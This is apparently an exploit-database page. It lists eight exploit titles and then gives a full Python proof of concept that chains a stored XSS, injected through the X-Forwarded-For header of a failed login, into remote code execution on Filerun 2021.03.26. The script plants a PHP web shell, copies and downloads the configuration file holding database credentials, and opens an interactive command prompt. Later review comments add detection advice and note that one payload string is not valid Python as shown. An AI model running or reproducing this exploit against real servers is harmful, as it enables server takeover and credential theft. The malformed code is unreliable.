
8 changes to exploits/shellcodes TotalAV 5.15.69 - Unquoted Service Path Simple Attendance System 1.0 - Unauthenticated Blind SQLi Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated) e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated) OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE) Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected) Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated) Online Reviewer System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Title: Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated)
# Date: 09/21/2021
# Exploit Author: syntegris information solutions GmbH
# Credits: Christian P.
# Vendor Homepage: https://filerun.com
# Software Link: https://f.afian.se/wl/?id=SkPwYC8dOcMIDWohmyjOqAgdqhRqCZ3X&fmode=download&recipient=d3d3LmZpbGVydW4uY29t
# Version: 2021.03.26
# Tested on: official docker image

# PoC for exploiting a chain of a stored XSS and authenticated Remote Code Execution
import requests
import time
import sys
# this is the plain version of the payload below
"""
var xmlhttp = new XMLHttpRequest();
var url = '/?module=cpanel&section=settings&page=image_preview&action=checkImageMagick'
var payload = "echo '<?php echo shell_exec($_REQUEST[\'cmd\']); ?>' > shell.php #";
xmlhttp.onreadystatechange = function() {
    if (xmlhttp.readyState == XMLHttpRequest.DONE) {
        if (xmlhttp.status == 200) {
            console.log(xmlhttp.responseText);
        }
    }
};
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("mode=exec&path=convert|"+payload);
"""
# Command-line contract: exactly one argument, the base URL of the FileRun
# instance. Every request below is built as "%s/<path>" % target, so the
# value is used verbatim as a URL prefix. Anything else prints a short
# message and exits with status 1.
if not len(sys.argv) == 2:
    print("missing target url")
    sys.exit(1)

# Module-level global read by inject_code(), check_shell_exists() and
# process_command().
target = sys.argv[1]
def inject_code():
    """Plant the stored-XSS element through a deliberately failing login.

    One POST goes to the login action with made-up credentials. The
    X-Forwarded-For request header carries an ``<img ... onerror=...>``
    element in the place where an IP address is expected. The response is
    not inspected and nothing is returned.

    NOTE(review): the file header describes a stored XSS chained with an
    authenticated RCE, and the caller prints "Injecting new log message...",
    so presumably FileRun 2021.03.26 records the header value with the failed
    login and later renders it unescaped to an administrator - confirm
    against the vendor's advisory.

    Defender view:
      * Detection: X-Forwarded-For values that do not parse as an IP
        address, especially on failed-login requests for unknown users.
      * Mitigation: accept X-Forwarded-For only from trusted reverse
        proxies, validate it as an address before storing it, and
        HTML-encode every log field on output.
    """
    # NOTE(review): as displayed, this literal is not valid Python - it opens
    # with one double quote, spans several lines and contains unescaped
    # double quotes. The comment earlier in the file calls the preceding
    # block "the plain version of the payload below", so the literal
    # presumably held an encoded form that the page rendering decoded -
    # TODO confirm against the original file.
    #
    # What the script asks the browser to do: POST mode=exec and
    # path=convert|<shell command> to the checkImageMagick settings action.
    # The "|" separator suggests the submitted ImageMagick path reaches a
    # shell unsanitised. Server-side, that parameter should be checked
    # against the expected binary path and executed without a shell; in
    # request logs, a "|" inside the path field of this action is the
    # indicator to search for.
    payload = "var xmlhttp = new XMLHttpRequest();
var url = '/?module=cpanel&section=settings&page=image_preview&action=checkImageMagick'
var payload = "echo '<?php echo shell_exec($_REQUEST[\'cmd\']); ?>'  > shell.php #";

xmlhttp.onreadystatechange = function() {
	if (xmlhttp.readyState == XMLHttpRequest.DONE) {
	   if (xmlhttp.status == 200) {
		   console.log(xmlhttp.responseText);
	   }
	   else if (xmlhttp.status == 400) {
		  alert('There was an error 400');
	   }
	   else {
		   alert('something else other than 200 was returned');
	   }
	}
};

xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("mode=exec&path=convert|"+payload);
"
    # The credentials are fixed dummy values ('nonexistend' / 'wrong'), so the
    # login is expected to fail; only the header value matters here.
    # `req` is assigned but never read.
    req = requests.post(
        "%s/?module=fileman&page=login&action=login" % target,
        data={'username': 'nonexistend', 'password': 'wrong', 'otp':'',
              'two_step_secret':'','language':''}, headers={'X-Forwarded-For': '<img src="/asdasdasd" onerror=%s >' % payload}
    )
def check_shell_exists():
    """Report whether ``<target>/shell.php`` answers with HTTP 200.

    Returns:
        True when the GET returns status 200, False for any other status.

    The injected script redirects its echo output to ``shell.php``, and this
    probe requests that name directly under the target URL. For incident
    response, an unexpected ``shell.php`` next to the application's entry
    point, or repeated GETs for it that return 404 before one returns 200,
    is the corresponding indicator.
    """
    req = requests.get("%s/shell.php" % target)
    if req.status_code != 200:
        return False
    return True
def process_command(command):
    """Send *command* to the planted ``shell.php`` and print the reply.

    Args:
        command: text placed in the ``cmd`` query parameter by %-formatting.

    Nothing is returned; the response body is written to stdout.

    In web-server access logs this shows up as GET requests for
    ``/shell.php`` with a ``cmd`` query parameter, which is a direct
    search term when reviewing a suspected compromise.
    """
    req = requests.get("%s/shell.php?cmd=%s" % (target, command))
    print(req.text)
# Delivery loop: each pass sends one more failing login that carries the
# script, waits 10 seconds, then probes for shell.php. It ends only when the
# probe returns 200. Seen from the server, this is a steady series of failed
# logins for the same unknown user at roughly 10-second intervals from one
# source - a pattern that login rate limiting or alerting would surface.
# NOTE(review): the listing lost its indentation; `break` is placed inside
# the `if` because that is the only placement that lets the loop repeat.
while True:
    print("Injecting new log message...")
    inject_code()
    time.sleep(10)
    if check_shell_exists():
        print("Shell exists under '%s/shell.php?cmd=ls'" % target)
        break

# Copies the application's configuration file to a .txt name under js/ so
# the web server returns it as plain text instead of executing it. The
# script's own message says the file contains database credentials.
print("Lets get autoconfig.php which contains database credentials...")
process_command("cp system/data/autoconfig.php js/autoconfig.txt")

# Downloads the copy and stores it locally as filerun.autoconfig.php.
ac_resp = requests.get("%s/js/autoconfig.txt" % target)
with open("filerun.autoconfig.php", "wb") as ac_f:
    ac_f.write(ac_resp.content)
# This removes js/autoconfig.php, a different name from the js/autoconfig.txt
# created above, so the readable copy of the configuration stays on the
# server. During response, look for js/autoconfig.txt and treat the database
# credentials as exposed (rotate them).
process_command("rm js/autoconfig.php")

# Interactive prompt: every line read is forwarded to process_command().
# The loop has no exit condition of its own.
while True:
    command = input("Command:")
    process_command(command)